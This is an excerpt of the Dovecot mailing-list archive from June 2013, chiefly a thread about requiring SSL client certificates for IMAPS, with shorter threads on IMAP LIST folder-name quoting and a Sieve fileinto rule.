OpenPGP digital signature URL: From irek.szczesniak at gmail.com Sat Jun 29 23:39:42 2013 From: irek.szczesniak at gmail.com (=?UTF-8?B?SXJlbmV1c3ogU3pjemXFm25pYWs=?=) Date: Sat, 29 Jun 2013 22:39:42 +0200 Subject: [Dovecot] IMAPS: Disable SSL connection without client certificate In-Reply-To: <51CF3DAD.9000509@thelounge.net> References: <51CE0097.90207@gmail.com> <51CE017A.4000404@thelounge.net> <51CF3B7E.5020800@gmail.com> <51CF3DAD.9000509@thelounge.net> Message-ID: <51CF460E.4030104@gmail.com> With my config, Dovecot disallows logging in when the SSL connection was established by a client without a certificate. In this case the client gets to talk to Dovecot. The client could exploit potential Dovecot vulnerabilities. Instead, I want the SSL connection to be dropped by OpenSSL when the client doesn't authenticate with a certificate, and so the client doesn't get to talk with Dovecot. This is safer, because the client is dropped by the well-tested OpenSSL. On 29.06.2013 22:03, Reindl Harald wrote: > Am 29.06.2013 21:54, schrieb Ireneusz Szcze?niak: >> Reindl, thanks again for your email, but now I realize that perhaps you misunderstood my problem. I have got the >> SSL working with the config presented in my first post. The problem is that I'm surprised that Dovecot lets >> clients establish an SSL connection even when the client doesn't present a certificate. I don't want clients >> without a valid certificate even establish an SSL connection. > > what the hell - you can reject them after not present a cert > but how do you imagine technically to smell this fact before connect? > >> On 28.06.2013 23:34, Reindl Harald wrote: >> >>> Am 28.06.2013 23:31, schrieb Ireneusz Szcze?niak: >>>> I've been using Dovecot 2.1.8 on OpenBSD 5.2 i386 for about a month. It works great. Dovecot serves IMAPS only, >>>> and I'm using Thunderbird to access my mail. >>>> >>>> I configured Dovecot to allow clients that present a valid certificate when establishing SSL connection. I >>>> configure my Thunderbird for SSL/TLS connection with normal password. It works fine. >>>> >>>> However, with my config anybody can connect to my server without presenting a certificate >>> >>> google "dovecot ssl client certificate" leads to >>> http://wiki.dovecot.org/SSL/DovecotConfiguration >>> >>> well, this is for dovecot 1.x, but have you tried it? >>> >>> Client certificate verification/authentication >>> If you want to require clients to present a valid SSL certificate, you'll need these settings > -- Ireneusz (Irek) Szczesniak http://www.irkos.org From h.reindl at thelounge.net Sat Jun 29 23:46:00 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Sat, 29 Jun 2013 22:46:00 +0200 Subject: [Dovecot] IMAPS: Disable SSL connection without client certificate In-Reply-To: <51CF460E.4030104@gmail.com> References: <51CE0097.90207@gmail.com> <51CE017A.4000404@thelounge.net> <51CF3B7E.5020800@gmail.com> <51CF3DAD.9000509@thelounge.net> <51CF460E.4030104@gmail.com> Message-ID: <51CF4788.3090703@thelounge.net> why are you refusing to understand that this is technical *nonsense* how do you imagine that "and so the client doesn't get to talk with Dovecot" by respect the dovecot configuration? damned inform you about network basics and do not demand impossible things like "the daemon listens to a port but the client must not talk to the daemon by magic without before authenticate against magic" Am 29.06.2013 22:39, schrieb Ireneusz Szcze?niak: > With my config, Dovecot disallows logging in when the SSL connection was established by a client without a > certificate. In this case the client gets to talk to Dovecot. The client could exploit potential Dovecot > vulnerabilities. > > Instead, I want the SSL connection to be dropped by OpenSSL when the client doesn't authenticate with a > certificate, and so the client doesn't get to talk with Dovecot. This is safer, because the client is dropped by > the well-tested OpenSSL. > > On 29.06.2013 22:03, Reindl Harald wrote: > >> Am 29.06.2013 21:54, schrieb Ireneusz Szcze?niak: >>> Reindl, thanks again for your email, but now I realize that perhaps you misunderstood my problem. I have got the >>> SSL working with the config presented in my first post. The problem is that I'm surprised that Dovecot lets >>> clients establish an SSL connection even when the client doesn't present a certificate. I don't want clients >>> without a valid certificate even establish an SSL connection. >> >> what the hell - you can reject them after not present a cert >> but how do you imagine technically to smell this fact before connect? >> >>> On 28.06.2013 23:34, Reindl Harald wrote: >>> >>>> Am 28.06.2013 23:31, schrieb Ireneusz Szcze?niak: >>>>> I've been using Dovecot 2.1.8 on OpenBSD 5.2 i386 for about a month. It works great. Dovecot serves IMAPS only, >>>>> and I'm using Thunderbird to access my mail. >>>>> >>>>> I configured Dovecot to allow clients that present a valid certificate when establishing SSL connection. I >>>>> configure my Thunderbird for SSL/TLS connection with normal password. It works fine. >>>>> >>>>> However, with my config anybody can connect to my server without presenting a certificate >>>> >>>> google "dovecot ssl client certificate" leads to >>>> http://wiki.dovecot.org/SSL/DovecotConfiguration >>>> >>>> well, this is for dovecot 1.x, but have you tried it? >>>> >>>> Client certificate verification/authentication >>>> If you want to require clients to present a valid SSL certificate, you'll need these settings -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From tss at iki.fi Sun Jun 30 00:25:56 2013 From: tss at iki.fi (Timo Sirainen) Date: Sun, 30 Jun 2013 00:25:56 +0300 Subject: [Dovecot] IMAPS: Disable SSL connection without client certificate In-Reply-To: <51CF460E.4030104@gmail.com> References: <51CE0097.90207@gmail.com> <51CE017A.4000404@thelounge.net> <51CF3B7E.5020800@gmail.com> <51CF3DAD.9000509@thelounge.net> <51CF460E.4030104@gmail.com> Message-ID: <9161A543-8EE0-44F9-95C1-3A033014F64C@iki.fi> On 29.6.2013, at 23.39, Ireneusz Szcze?niak wrote: > With my config, Dovecot disallows logging in when the SSL connection was established by a client without a certificate. In this case the client gets to talk to Dovecot. The client could exploit potential Dovecot vulnerabilities. > > Instead, I want the SSL connection to be dropped by OpenSSL when the client doesn't authenticate with a certificate, and so the client doesn't get to talk with Dovecot. OpenSSL can't really drop the connection. Dovecot could do it earlier, but that would complicate the code. I'm not planning on adding such extra code, since the current way works as well. > This is safer, because the client is dropped by the well-tested OpenSSL. One of the main reasons for Dovecot's pre-login and post-login privilege separation was so that OpenSSL could be separated into Dovecot's untrusted pre-login sandboxed process :) OpenSSL is a highly complex piece of software compared to what Dovecot has to do. The one thing I have been considering is that Dovecot's pre-login process would present the client's SSL certificate to Dovecot's auth process, which would independently verify that it's correct. That could be useful I think, although it would also present an additional attack layer to the auth process in case there are OpenSSL vulnerabilities (and auth process may run with more privileges than login process). From eric at ericabrahamsen.net Sun Jun 30 05:02:20 2013 From: eric at ericabrahamsen.net (Eric Abrahamsen) Date: Sun, 30 Jun 2013 10:02:20 +0800 Subject: [Dovecot] LIST command -- quoting of folder names Message-ID: <87sj00we37.fsf@ericabrahamsen.net> If I open an imap connection to a local maildir installation like so: /usr/lib/dovecot/imap -o mail_location=maildir:$HOME/.mail/account/:LAYOUT=fs And issue: c list "" * This is the result (this is a gmail account): * LIST (\HasChildren) "/" [Gmail] * LIST (\HasNoChildren) "/" [Gmail]/Spam * LIST (\HasNoChildren) "/" [Gmail]/Starred * LIST (\HasNoChildren) "/" [Gmail]/Trash * LIST (\HasNoChildren) "/" [Gmail]/Drafts * LIST (\HasNoChildren) "/" "[Gmail]/Sent Mail" * LIST (\HasNoChildren) "/" [Gmail]/Important * LIST (\HasNoChildren) "/" INBOX Only "[Gmail]/Sent Mail" is quoted. This is messing up gnus, my MUA, which truncates other folder names after the / separator. Examples of testing I've seen online have shown all folder names quoted, which would allow things to work correctly here. Is this something I can affect with local configuration, or is there some other solution? Would removing "LAYOUT=fs" affect this issue? Thanks! Eric Output of dovecot -n: # 2.2.4: /etc/dovecot/dovecot.conf # OS: Linux 3.9.7-1-ARCH i686 Arch Linux info_log_path = /var/log/dovecot-info.log log_path = /var/log/dovecot.log protocols = imap From irek.szczesniak at gmail.com Sun Jun 30 09:30:28 2013 From: irek.szczesniak at gmail.com (=?UTF-8?B?SXJlbmV1c3ogU3pjemXFm25pYWs=?=) Date: Sun, 30 Jun 2013 08:30:28 +0200 Subject: [Dovecot] IMAPS: Disable SSL connection without client certificate In-Reply-To: <9161A543-8EE0-44F9-95C1-3A033014F64C@iki.fi> References: <51CE0097.90207@gmail.com> <51CE017A.4000404@thelounge.net> <51CF3B7E.5020800@gmail.com> <51CF3DAD.9000509@thelounge.net> <51CF460E.4030104@gmail.com> <9161A543-8EE0-44F9-95C1-3A033014F64C@iki.fi> Message-ID: <51CFD084.50207@gmail.com> Thank you, Timo, for your detailed and authoritative response. Now I know that my config is fine, and that I didn't miss some option. Thanks again! On 29.06.2013 23:25, Timo Sirainen wrote: > On 29.6.2013, at 23.39, Ireneusz Szcze?niak wrote: > >> With my config, Dovecot disallows logging in when the SSL connection was established by a client without a certificate. In this case the client gets to talk to Dovecot. The client could exploit potential Dovecot vulnerabilities. >> >> Instead, I want the SSL connection to be dropped by OpenSSL when the client doesn't authenticate with a certificate, and so the client doesn't get to talk with Dovecot. > > OpenSSL can't really drop the connection. Dovecot could do it earlier, but that would complicate the code. I'm not planning on adding such extra code, since the current way works as well. > >> This is safer, because the client is dropped by the well-tested OpenSSL. > > > One of the main reasons for Dovecot's pre-login and post-login privilege separation was so that OpenSSL could be separated into Dovecot's untrusted pre-login sandboxed process :) OpenSSL is a highly complex piece of software compared to what Dovecot has to do. > > The one thing I have been considering is that Dovecot's pre-login process would present the client's SSL certificate to Dovecot's auth process, which would independently verify that it's correct. That could be useful I think, although it would also present an additional attack layer to the auth process in case there are OpenSSL vulnerabilities (and auth process may run with more privileges than login process). -- Ireneusz (Irek) Szczesniak http://www.irkos.org From d.parthey at metaways.de Sun Jun 30 17:38:21 2013 From: d.parthey at metaways.de (Daniel Parthey) Date: Sun, 30 Jun 2013 16:38:21 +0200 Subject: [Dovecot] namespace delivery question In-Reply-To: <20130629184638.M19581@madalbal.hu> References: <20130627115159.M11417@madalbal.hu> <20130628133734.GA25817@nihlus.leuxner.net> <20130629184638.M19581@madalbal.hu> Message-ID: <1d6e8f48-81ab-4df1-a3ba-89b44f4bb61e@email.android.com> Add the :create flag to your SIEVE rule in order to automatically create mailboxes if nonexistent. require "fileinto"; if address :is ["To","CC"] "info at domain.com" { fileinto :create "public/info"; } Regards Daniel From me at junc.eu Sun Jun 30 17:53:40 2013 From: me at junc.eu (Benny Pedersen) Date: Sun, 30 Jun 2013 16:53:40 +0200 Subject: [Dovecot] IMAPS: Disable SSL connection without client certificate In-Reply-To: <51CF3B7E.5020800@gmail.com> References: <51CE0097.90207@gmail.com> <51CE017A.4000404@thelounge.net> <51CF3B7E.5020800@gmail.com> Message-ID: Ireneusz Szcze?niak skrev den 2013-06-29 21:54: > Reindl, thanks again for your email, but now I realize that perhaps > you misunderstood my problem. I have got the SSL working with the > config presented in my first post. The problem is that I'm surprised > that Dovecot lets clients establish an SSL connection even when the > client doesn't present a certificate. I don't want clients without a > valid certificate even establish an SSL connection. its a chicken and egg problem to get resolved, you cant drop the eggs if the chicken dont create them, that might be why dovecot have no solution on this problem -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From me at junc.eu Sun Jun 30 17:56:12 2013 From: me at junc.eu (Benny Pedersen) Date: Sun, 30 Jun 2013 16:56:12 +0200 Subject: [Dovecot] =?utf-8?q?IMAPS=3A_Disable_SSL_connection_without_clien?= =?utf-8?q?t=09certificate?= In-Reply-To: <51CF460E.4030104@gmail.com> References: <51CE0097.90207@gmail.com> <51CE017A.4000404@thelounge.net> <51CF3B7E.5020800@gmail.com> <51CF3DAD.9000509@thelounge.net> <51CF460E.4030104@gmail.com> Message-ID: <8f4590e24179098d4ca27194caaa30e2@junc.eu> Ireneusz Szcze?niak skrev den 2013-06-29 22:39: > With my config, Dovecot disallows logging in when the SSL connection > was established by a client without a certificate. In this case the > client gets to talk to Dovecot. The client could exploit potential > Dovecot vulnerabilities. fair > Instead, I want the SSL connection to be dropped by OpenSSL when the > client doesn't authenticate with a certificate, and so the client > doesn't get to talk with Dovecot. This is safer, because the client > is dropped by the well-tested OpenSSL. so far only a dream -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From CMarcus at Media-Brokers.com Sat Jun 29 16:54:02 2013 From: CMarcus at Media-Brokers.com (Charles Marcus) Date: Sat, 29 Jun 2013 09:54:02 -0400 Subject: [Dovecot] IMAPS: Disable SSL connection without client certificate In-Reply-To: <51CE80E5.3050509@gmail.com> References: <51CE0097.90207@gmail.com> <51CE017A.4000404@thelounge.net> <51CE80E5.3050509@gmail.com> Message-ID: <51CEE6FA.9020201@Media-Brokers.com> Please do not top-post in an inline thread... On 2013-06-29 2:38 AM, Ireneusz Szcze?niak wrote: > On 28.06.2013 23:34, Reindl Harald wrote: >> >> Am 28.06.2013 23:31, schrieb Ireneusz Szcze?niak: >>> I've been using Dovecot 2.1.8 on OpenBSD 5.2 i386 for about a month. >>> It works great. Dovecot serves IMAPS only, >>> and I'm using Thunderbird to access my mail. >>> >>> I configured Dovecot to allow clients that present a valid >>> certificate when establishing SSL connection. I >>> configure my Thunderbird for SSL/TLS connection with normal >>> password. It works fine. >>> >>> However, with my config anybody can connect to my server without >>> presenting a certificate >> >> google "dovecot ssl client certificate" leads to >> http://wiki.dovecot.org/SSL/DovecotConfiguration >> >> well, this is for dovecot 1.x, but have you tried it? >> >> Client certificate verification/authentication >> If you want to require clients to present a valid SSL certificate, >> you'll need these settings: >> >> ssl_ca_file = /etc/ssl/ca.pem >> ssl_verify_client_cert = yes >> auth default { >> ssl_require_client_cert = yes >> .. >> } > Thanks for your email. Yes, I looked before at that website before. > I'm using these options with Dovecot 2.1.8, among others: > > auth_ssl_require_client_cert = yes > ssl_verify_client_cert = yes > ssl_ca =